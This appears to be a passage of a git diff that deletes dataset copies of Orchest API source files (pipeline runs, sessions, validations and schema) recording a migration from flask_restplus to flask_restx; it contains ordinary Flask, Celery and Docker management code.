models.InteractivePipelineRun.query - - # Ability to query a specific runs given the `pipeline_uuid` or `project_uuid` - # through the URL (using `request.args`). - if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - runs = query.all() - return {"runs": [run.__dict__ for run in runs]}, 200 - - @api.doc("start_run") - @api.expect(schema.interactive_run_spec) - def post(self): - """Starts a new (interactive) pipeline run.""" - post_data = request.get_json() - post_data["run_config"]["run_endpoint"] = "runs" - - pipeline = construct_pipeline(**post_data) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - # NOTE: we are setting the status of the run ourselves without - # using the option of celery to get the status of tasks. This - # way we do not have to configure a backend (where the default - # of "rpc://" does not give the results we would want). 
- run = { - "run_uuid": task_id, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.InteractivePipelineRun(**run)) - # need to flush because otherwise the bulk insertion of pipeline - # steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # Set an initial value for the status of the pipeline steps that - # will be run. - step_uuids = [s.properties["uuid"] for s in pipeline.steps] - - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{"run_uuid": task_id, "step_uuid": step_uuid, "status": "PENDING"} - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - run["pipeline_steps"] = pipeline_steps - - # get docker ids of images to use and make it so that the images - # will not be deleted in case they become outdated by an - # environment rebuild - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - logging.error( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - # TODO: make it so that the client does not rely - # on SUCCESS as a status - run["status"] = "SUCCESS" - for step in run["pipeline_steps"]: - step.status = "FAILURE" - models.InteractivePipelineRun.query.filter_by(run_uuid=task_id).update( - {"status": "SUCCESS"} - ) - models.PipelineRunStep.query.filter_by(run_uuid=task_id).update( - {"status": "FAILURE"} - ) - db.session.commit() - - return { - "message": "Failed to start interactive run because not all referenced environments are available." - }, 500 - - # Create Celery object with the Flask context and construct the - # kwargs for the job. - celery = make_celery(current_app) - run_config = post_data["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "pipeline_definition": pipeline.to_dict(), - "project_uuid": post_data["project_uuid"], - "run_config": run_config, - } - - # Start the run as a background task on Celery. Due to circular - # imports we send the task by name instead of importing the - # function directly. - res = celery.send_task( - "app.core.tasks.run_pipeline", kwargs=celery_job_kwargs, task_id=task_id - ) - - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. 
- res.forget() - return marshal(run, schema.interactive_run), 201 - - -@api.route("/") -@api.param("run_uuid", "UUID of Run") -@api.response(404, "Run not found") -class Run(Resource): - @api.doc("get_run") - @api.marshal_with(schema.interactive_run, code=200) - def get(self, run_uuid): - """Fetches an interactive pipeline run given its UUID.""" - run = models.InteractivePipelineRun.query.filter_by( - run_uuid=run_uuid - ).one_or_none() - if run is None: - abort(404, description="Run not found") - return run.__dict__ - - @api.doc("set_run_status") - @api.expect(schema.status_update) - def put(self, run_uuid): - """Sets the status of a pipeline run.""" - post_data = request.get_json() - - res = models.InteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": post_data["status"]} - ) - - if res: - db.session.commit() - - return {"message": "Status was updated successfully"}, 200 - - @api.doc("delete_run") - @api.response(200, "Run terminated") - def delete(self, run_uuid): - """Stops a pipeline run given its UUID.""" - if stop_pipeline_run(run_uuid): - return {"message": "Run termination was successful"}, 200 - else: - return {"message": "Run does not exist or is not running"}, 400 - - -@api.route("//") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Pipeline Step") -@api.response(404, "Pipeline step not found") -class StepStatus(Resource): - @api.doc("get_step_status") - @api.marshal_with(schema.pipeline_run_pipeline_step, code=200) - def get(self, run_uuid, step_uuid): - """Fetches the status of a pipeline step of a specific run.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Run and step combination not found", - ) - return step.__dict__ - - @api.doc("set_step_status") - @api.expect(schema.status_update) - def put(self, run_uuid, step_uuid): - """Sets the status of a pipeline step.""" - status_update = request.get_json() - - # TODO: first check the status and make sure it says PENDING or - # whatever. Because if is empty then this would write it - # and then get overwritten afterwards with "PENDING". - filter_by = {"run_uuid": run_uuid, "step_uuid": step_uuid} - update_status_db( - status_update, model=models.PipelineRunStep, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -def stop_pipeline_run(run_uuid) -> bool: - """Stop a pipeline run. - - The run will cancelled if not running yet, otherwise - it will be aborted. - - Args: - run_uuid: - - Returns: - True if a cancellation was issued to the run, false if the - run did not exist or was not PENDING/STARTED. 
- """ - interactive_run = models.PipelineRun.query.filter( - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - models.PipelineRun.run_uuid == run_uuid, - ).one_or_none() - if interactive_run is None: - return False - - celery_app = make_celery(current_app) - res = AbortableAsyncResult(run_uuid, app=celery_app) - - # it is responsibility of the task to terminate by reading - # it's aborted status - res.abort() - - celery_app.control.revoke(run_uuid) - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the - # task will try to set the status as well - - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff deleted file mode 100644 index 9c1a8e5..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_sessions.py b/services/orchest-api/app/app/apis/namespace_sessions.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_sessions.py - +++ b/services/orchest-api/app/app/apis/namespace_sessions.py -@@ -2,7 +2,7 @@ import logging - import sys - - from flask import request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app import schema diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py deleted file mode 100644 index e21a7e8..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py +++ /dev/null @@ -1,179 +0,0 @@ -import logging -import sys - -from flask import request -from flask_restplus import Namespace, Resource - -import app.models as models -from app import schema -from app.connections import db, docker_client -from app.core.sessions import InteractiveSession -from app.utils import register_schema - -logging.basicConfig(stream=sys.stdout, level=logging.INFO) - -api = Namespace("sessions", description="Manage interactive sessions") -api = register_schema(api) - - -@api.route("/") -class SessionList(Resource): - @api.doc("fetch_sessions") - @api.marshal_with(schema.sessions) - def get(self): - """Fetches all sessions.""" - query = models.InteractiveSession.query - - # TODO: why is this used instead of the Session.get() ? - # Ability to query a specific session given its `pipeline_uuid` - # through the URL (using `request.args`). 
- if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - sessions = query.all() - - return {"sessions": [session.as_dict() for session in sessions]}, 200 - - @api.doc("launch_session") - @api.expect(schema.pipeline) - @api.marshal_with(schema.session, code=201, description="Session launched.") - def post(self): - """Launches an interactive session.""" - post_data = request.get_json() - - # TODO: error handling. If it does not succeed then the initial - # entry has to be removed from the database as otherwise - # no session can be started in the future due to unique - # constraint. - - # Add initial entry to database. - pipeline_uuid = post_data["pipeline_uuid"] - pipeline_path = post_data["pipeline_path"] - project_uuid = post_data["project_uuid"] - - interactive_session = { - "project_uuid": project_uuid, - "pipeline_uuid": pipeline_uuid, - "status": "LAUNCHING", - } - db.session.add(models.InteractiveSession(**interactive_session)) - db.session.commit() - - session = InteractiveSession(docker_client, network="orchest") - session.launch( - pipeline_uuid, - project_uuid, - pipeline_path, - post_data["project_dir"], - post_data["settings"]["data_passing_memory_size"], - post_data["host_userdir"], - ) - - # Update the database entry with information to connect to the - # launched resources. - IP = session.get_containers_IP() - interactive_session.update( - { - "status": "RUNNING", - "container_ids": session.get_container_IDs(), - "jupyter_server_ip": IP.jupyter_server, - "notebook_server_info": session.notebook_server_info, - } - ) - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).update(interactive_session) - db.session.commit() - - return interactive_session, 201 - - -@api.route("//") -@api.param("project_uuid", "UUID of project") -@api.param("pipeline_uuid", "UUID of pipeline") -@api.response(404, "Session not found") -class Session(Resource): - """Manages interactive sessions. - - There can only be 1 interactive session per pipeline. Interactive - sessions are uniquely identified by the pipeline's UUID. - """ - - @api.doc("get_session") - @api.marshal_with(schema.session) - def get(self, project_uuid, pipeline_uuid): - """Fetch a session given the pipeline UUID.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found." 
- ) - return session.as_dict() - - @api.doc("shutdown_session") - @api.response(200, "Session stopped") - @api.response(404, "Session not found") - def delete(self, project_uuid, pipeline_uuid): - """Shuts down the session.""" - if stop_interactive_session(project_uuid, pipeline_uuid): - return {"message": "Session shutdown was successful"}, 200 - else: - return {"message": "Session not found"}, 400 - - @api.doc("restart_memory_server_of_session") - @api.response(200, "Session resource memory-server restarted") - @api.response(404, "Session not found") - def put(self, project_uuid, pipeline_uuid): - """Restarts the memory-server of the session.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found" - ) - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # Note: The entry in the database does not have to be updated - # since restarting the `memory-server` does not change its - # Docker ID. - session_obj.restart_resource(resource_name="memory-server") - - return {"message": "Session restart was successful"}, 200 - - -def stop_interactive_session(project_uuid, pipeline_uuid) -> bool: - """Stops an interactive session. - - Args: - project_uuid: - pipeline_uuid: - - Returns: - True if the session was stopped, false if no session was found. - """ - session = models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).one_or_none() - if session is None: - return False - - session.status = "STOPPING" - db.session.commit() - - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # TODO: error handling? - session_obj.shutdown() - - db.session.delete(session) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py deleted file mode 100644 index c7c1b78..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py +++ /dev/null @@ -1,179 +0,0 @@ -import logging -import sys - -from flask import request -from flask_restx import Namespace, Resource - -import app.models as models -from app import schema -from app.connections import db, docker_client -from app.core.sessions import InteractiveSession -from app.utils import register_schema - -logging.basicConfig(stream=sys.stdout, level=logging.INFO) - -api = Namespace("sessions", description="Manage interactive sessions") -api = register_schema(api) - - -@api.route("/") -class SessionList(Resource): - @api.doc("fetch_sessions") - @api.marshal_with(schema.sessions) - def get(self): - """Fetches all sessions.""" - query = models.InteractiveSession.query - - # TODO: why is this used instead of the Session.get() ? - # Ability to query a specific session given its `pipeline_uuid` - # through the URL (using `request.args`).
- if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - sessions = query.all() - - return {"sessions": [session.as_dict() for session in sessions]}, 200 - - @api.doc("launch_session") - @api.expect(schema.pipeline) - @api.marshal_with(schema.session, code=201, description="Session launched.") - def post(self): - """Launches an interactive session.""" - post_data = request.get_json() - - # TODO: error handling. If it does not succeed then the initial - # entry has to be removed from the database as otherwise - # no session can be started in the future due to unique - # constraint. - - # Add initial entry to database. - pipeline_uuid = post_data["pipeline_uuid"] - pipeline_path = post_data["pipeline_path"] - project_uuid = post_data["project_uuid"] - - interactive_session = { - "project_uuid": project_uuid, - "pipeline_uuid": pipeline_uuid, - "status": "LAUNCHING", - } - db.session.add(models.InteractiveSession(**interactive_session)) - db.session.commit() - - session = InteractiveSession(docker_client, network="orchest") - session.launch( - pipeline_uuid, - project_uuid, - pipeline_path, - post_data["project_dir"], - post_data["settings"]["data_passing_memory_size"], - post_data["host_userdir"], - ) - - # Update the database entry with information to connect to the - # launched resources. - IP = session.get_containers_IP() - interactive_session.update( - { - "status": "RUNNING", - "container_ids": session.get_container_IDs(), - "jupyter_server_ip": IP.jupyter_server, - "notebook_server_info": session.notebook_server_info, - } - ) - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).update(interactive_session) - db.session.commit() - - return interactive_session, 201 - - -@api.route("//") -@api.param("project_uuid", "UUID of project") -@api.param("pipeline_uuid", "UUID of pipeline") -@api.response(404, "Session not found") -class Session(Resource): - """Manages interactive sessions. - - There can only be 1 interactive session per pipeline. Interactive - sessions are uniquely identified by the pipeline's UUID. - """ - - @api.doc("get_session") - @api.marshal_with(schema.session) - def get(self, project_uuid, pipeline_uuid): - """Fetch a session given the pipeline UUID.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found." 
- ) - return session.as_dict() - - @api.doc("shutdown_session") - @api.response(200, "Session stopped") - @api.response(404, "Session not found") - def delete(self, project_uuid, pipeline_uuid): - """Shuts down the session.""" - if stop_interactive_session(project_uuid, pipeline_uuid): - return {"message": "Session shutdown was successful"}, 200 - else: - return {"message": "Session not found"}, 400 - - @api.doc("restart_memory_server_of_session") - @api.response(200, "Session resource memory-server restarted") - @api.response(404, "Session not found") - def put(self, project_uuid, pipeline_uuid): - """Restarts the memory-server of the session.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found" - ) - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # Note: The entry in the database does not have to be updated - # since restarting the `memory-server` does not change its - # Docker ID. - session_obj.restart_resource(resource_name="memory-server") - - return {"message": "Session restart was successful"}, 200 - - -def stop_interactive_session(project_uuid, pipeline_uuid) -> bool: - """Stops an interactive session. - - Args: - project_uuid: - pipeline_uuid: - - Returns: - True if the session was stopped, false if no session was found. - """ - session = models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).one_or_none() - if session is None: - return False - - session.status = "STOPPING" - db.session.commit() - - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # TODO: error handling?
- session_obj.shutdown() - - db.session.delete(session) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff deleted file mode 100644 index 00ba131..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_validations.py b/services/orchest-api/app/app/apis/namespace_validations.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_validations.py - +++ b/services/orchest-api/app/app/apis/namespace_validations.py -@@ -4,7 +4,7 @@ from typing import Optional, Tuple - - import docker - from flask import request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from _orchest.internals import config as _config diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py deleted file mode 100644 index 854efdb..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py +++ /dev/null @@ -1,103 +0,0 @@ -"""API endpoint to do system level validations.""" - -from typing import Optional, Tuple - -import docker -from flask import request -from flask_restplus import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import docker_client -from app.utils import register_schema - -api = Namespace("validations", description="Validates system requirements") -api = register_schema(api) - - -def validate_environment(project_uuid: str, env_uuid: str) -> Tuple[str, Optional[str]]: - """Validates whether the environments exist on the system. - - Only passes if the condition below is satisfied: - * The image: ``_config.ENVIRONMENT_IMAGE_NAME`` exists in the - docker namespace. - - Args: - project_uuid: Project UUID for which the environment should - exist. - env_uuid: Environment UUID to check. - - Returns: - (check, action) - - `check` is "pass" or "fail". - - `action` is one of ["BUILD", "WAIT", "RETRY", None] - - """ - # Check the docker namespace. - docker_image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - try: - docker_client.images.get(docker_image_name) - except docker.errors.ImageNotFound: - # Check the build history for the environment to determine the - # action. - env_builds = models.EnvironmentBuild.query.filter_by( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - num_building_builds = env_builds.filter( - models.EnvironmentBuild.status.in_(["PENDING", "STARTED"]) - ).count() - - if num_building_builds: - return "fail", "WAIT" - else: - return "fail", "BUILD" - - except docker.errors.APIError: - # We cannot determine what happened, so better be safe than - # sorry. 
- return "fail", "RETRY" - - return "pass", None - - -@api.route("/environments") -class Gate(Resource): - @api.doc("validate_environments") - @api.expect(schema.validation_environments) - @api.marshal_with( - schema.validation_environments_result, - code=201, - description="Validation of environments", - ) - def post(self): - """Checks whether the given environments have been built and are ready. - - NOTE: The order of ``["fail"]`` and ``["action"]`` indicates the - required action to convert the "fail" to a "pass". - - """ - post_data = request.get_json() - environment_uuids = post_data["environment_uuids"] - project_uuid = post_data["project_uuid"] - - res = { - "validation": None, # Will be set last - "fail": [], - "actions": [], - "pass": [], - } - for env_uuid in environment_uuids: - # Check will be either "fail" or "pass". - validation, action = validate_environment(project_uuid, env_uuid) - res[validation].append(env_uuid) - - if validation == "fail": - res["actions"].append(action) - - res["validation"] = "fail" if len(res["fail"]) != 0 else "pass" - return res, 201 diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py deleted file mode 100644 index 333c856..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py +++ /dev/null @@ -1,103 +0,0 @@ -"""API endpoint to do system level validations.""" - -from typing import Optional, Tuple - -import docker -from flask import request -from flask_restx import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import docker_client -from app.utils import register_schema - -api = Namespace("validations", description="Validates system requirements") -api = register_schema(api) - - -def validate_environment(project_uuid: str, env_uuid: str) -> Tuple[str, Optional[str]]: - """Validates whether the environments exist on the system. - - Only passes if the condition below is satisfied: - * The image: ``_config.ENVIRONMENT_IMAGE_NAME`` exists in the - docker namespace. - - Args: - project_uuid: Project UUID for which the environment should - exist. - env_uuid: Environment UUID to check. - - Returns: - (check, action) - - `check` is "pass" or "fail". - - `action` is one of ["BUILD", "WAIT", "RETRY", None] - - """ - # Check the docker namespace. - docker_image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - try: - docker_client.images.get(docker_image_name) - except docker.errors.ImageNotFound: - # Check the build history for the environment to determine the - # action. - env_builds = models.EnvironmentBuild.query.filter_by( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - num_building_builds = env_builds.filter( - models.EnvironmentBuild.status.in_(["PENDING", "STARTED"]) - ).count() - - if num_building_builds: - return "fail", "WAIT" - else: - return "fail", "BUILD" - - except docker.errors.APIError: - # We cannot determine what happened, so better be safe than - # sorry. 
- return "fail", "RETRY" - - return "pass", None - - -@api.route("/environments") -class Gate(Resource): - @api.doc("validate_environments") - @api.expect(schema.validation_environments) - @api.marshal_with( - schema.validation_environments_result, - code=201, - description="Validation of environments", - ) - def post(self): - """Checks whether the given environments have been built and are ready. - - NOTE: The order of ``["fail"]`` and ``["action"]`` indicates the - required action to convert the "fail" to a "pass". - - """ - post_data = request.get_json() - environment_uuids = post_data["environment_uuids"] - project_uuid = post_data["project_uuid"] - - res = { - "validation": None, # Will be set last - "fail": [], - "actions": [], - "pass": [], - } - for env_uuid in environment_uuids: - # Check will be either "fail" or "pass". - validation, action = validate_environment(project_uuid, env_uuid) - res[validation].append(env_uuid) - - if validation == "fail": - res["actions"].append(action) - - res["validation"] = "fail" if len(res["fail"]) != 0 else "pass" - return res, 201 diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff deleted file mode 100644 index 4e170c8..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/schema.py b/services/orchest-api/app/app/schema.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/schema.py - +++ b/services/orchest-api/app/app/schema.py -@@ -6,7 +6,7 @@ TODO: - to share attributes? - - """ --from flask_restplus import Model, fields -+from flask_restx import Model, fields - - from _orchest.internals import config as _config - diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py deleted file mode 100644 index 9a8e1db..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py +++ /dev/null @@ -1,383 +0,0 @@ -""" - -TODO: - * Would be amazing if we did not have to maintain a schema here and - also a seperate but exactly similar database model. Is there a way - to share attributes? 
- -""" -from flask_restplus import Model, fields - -from _orchest.internals import config as _config - -# Namespace: Sessions -server = Model( - "Server", - { - "port": fields.Integer( - required=True, default=8888, description="Port to access the server" - ), - "base_url": fields.String(required=True, default="/", description="Base URL"), - }, -) - -session = Model( - "Session", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of session"), - "jupyter_server_ip": fields.String( - required=True, description="IP of the jupyter-server" - ), - "notebook_server_info": fields.Nested( - server, required=True, description="Jupyter notebook server connection info" - ), - }, -) - -sessions = Model( - "Sessions", - { - "sessions": fields.List( - fields.Nested(session), description="Currently running sessions" - ) - }, -) - -pipeline = Model( - "Pipeline", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - "project_dir": fields.String( - required=True, description="Path to pipeline files" - ), - "host_userdir": fields.String( - required=True, description="Host path to userdir" - ), - "settings": fields.Raw( - required=True, description="Settings from the pipeline definition" - ), - }, -) - -# Namespace: Runs & Experiments -pipeline_run_config = Model( - "PipelineRunConfig", - { - "project_dir": fields.String( - required=True, description="Path to project files" - ), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - }, -) - -pipeline_run_spec = Model( - "PipelineRunSpec", - { - "uuids": fields.List( - fields.String(), required=False, description="UUIDs of pipeline steps" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "run_type": fields.String( - required=False, - default="full", # TODO: check whether default is used if required=False - description="Type of run", - enum=["full", "selection", "incoming"], - ), - }, -) - -pipeline_run_pipeline_step = Model( - "PipelineRunPipelineStep", - { - "run_uuid": fields.String(required=True, description="UUID of the run"), - "step_uuid": fields.String( - required=True, description="UUID of the pipeline step" - ), - "status": fields.String( - required=True, - description="Status of the step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - "started_time": fields.String( - required=True, description="Time at which the step started executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the step finished executing" - ), - }, -) - -pipeline_run = Model( - "Run", - { - "run_uuid": fields.String(required=True, description="UUID of run"), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of the run"), - "pipeline_steps": fields.List( # TODO: rename - fields.Nested(pipeline_run_pipeline_step), - description="Status of each pipeline step", - ), - }, -) - -interactive_run_config = pipeline_run_config.inherit("InteractiveRunConfig", {}) - -interactive_run_spec = 
pipeline_run_spec.inherit( - "InteractiveRunSpec", - { - "pipeline_definition": fields.Raw( - required=True, description="Pipeline definition in JSON" - ), - "run_config": fields.Nested( - interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - }, -) - -interactive_run = pipeline_run.inherit("InteractiveRun", {}) - -interactive_runs = Model( - "InteractiveRuns", - { - "runs": fields.List( - fields.Nested(interactive_run), - description='All ran interactive runs during this "lifecycle" of Orchest', - ) - }, -) - -status_update = Model( - "StatusUpdate", - { - "status": fields.String( - required=True, - description="New status of executable, e.g. pipeline or step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - }, -) - -# Namespace: Experiments. -non_interactive_run_config = pipeline_run_config.inherit( - "NonInteractiveRunConfig", - { - # Needed for the celery-worker to set the new project-dir for - # experiments. Note that the `orchest-webserver` has this value - # stored in the ENV variable `HOST_USER_DIR`. - "host_user_dir": fields.String( - required=True, description="Path to the /userdir on the host" - ), - }, -) - -non_interactive_run_spec = pipeline_run_spec.inherit( - "NonInteractiveRunSpec", - { - "run_config": fields.Nested( - non_interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - "scheduled_start": fields.String( # TODO: make DateTime - required=False, - # default=datetime.utcnow().isoformat(), - description="Time at which the run is scheduled to start", - ), - }, -) - -non_interactive_run = pipeline_run.inherit( - "NonInteractiveRun", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "pipeline_run_id": fields.Integer( - required=True, description="Respective run ID in experiment" - ), - }, -) - -experiment_spec = Model( - "ExperimentSpecification", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_definitions": fields.List( - fields.Raw(description="Pipeline definition in JSON"), - required=True, - description="Collection of pipeline definitions", - ), - "pipeline_run_ids": fields.List( - fields.Integer( - description=( - "Pipeline index corresponding to respective " - "list entries in pipeline_definitions." - ) - ), - required=True, - description="Collection of pipeline definition indices.", - ), - "pipeline_run_spec": fields.Nested( - non_interactive_run_spec, - required=True, - description='Specification of the pipeline runs, e.g. 
"full", "incoming" etc', - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - }, -) - -experiment = Model( - "Experiment", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "total_number_of_pipeline_runs": fields.Integer( - required=True, - description="Total number of pipeline runs part of the experiment", - ), - "pipeline_runs": fields.List( - fields.Nested(non_interactive_run), - description="Collection of pipeline runs part of the experiment", - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - "completed_pipeline_runs": fields.Integer( - required=True, - default=0, - description="Number of completed pipeline runs part of the experiment", - ), - }, -) - -experiments = Model( - "Experiments", - { - "experiments": fields.List( - fields.Nested(experiment), description="Collection of all experiments" - ), - }, -) - -environment_build = Model( - "EnvironmentBuild", - { - "build_uuid": fields.String( - required=True, description="UUID of the environment build" - ), - "project_uuid": fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - "requested_time": fields.String( - required=True, description="Time at which the build was requested" - ), - "started_time": fields.String( - required=True, description="Time at which the build started executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the build finished executing" - ), - "status": fields.String( - required=True, - description="Status of the build", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED"], - ), - }, -) - -environment_builds = Model( - "EnvironmentBuilds", - { - "environment_builds": fields.List( - fields.Nested(environment_build), - description="Collection of environment_builds", - ), - }, -) - -environment_build_request = Model( - "EnvironmentBuildRequest", - { - "project_uuid": 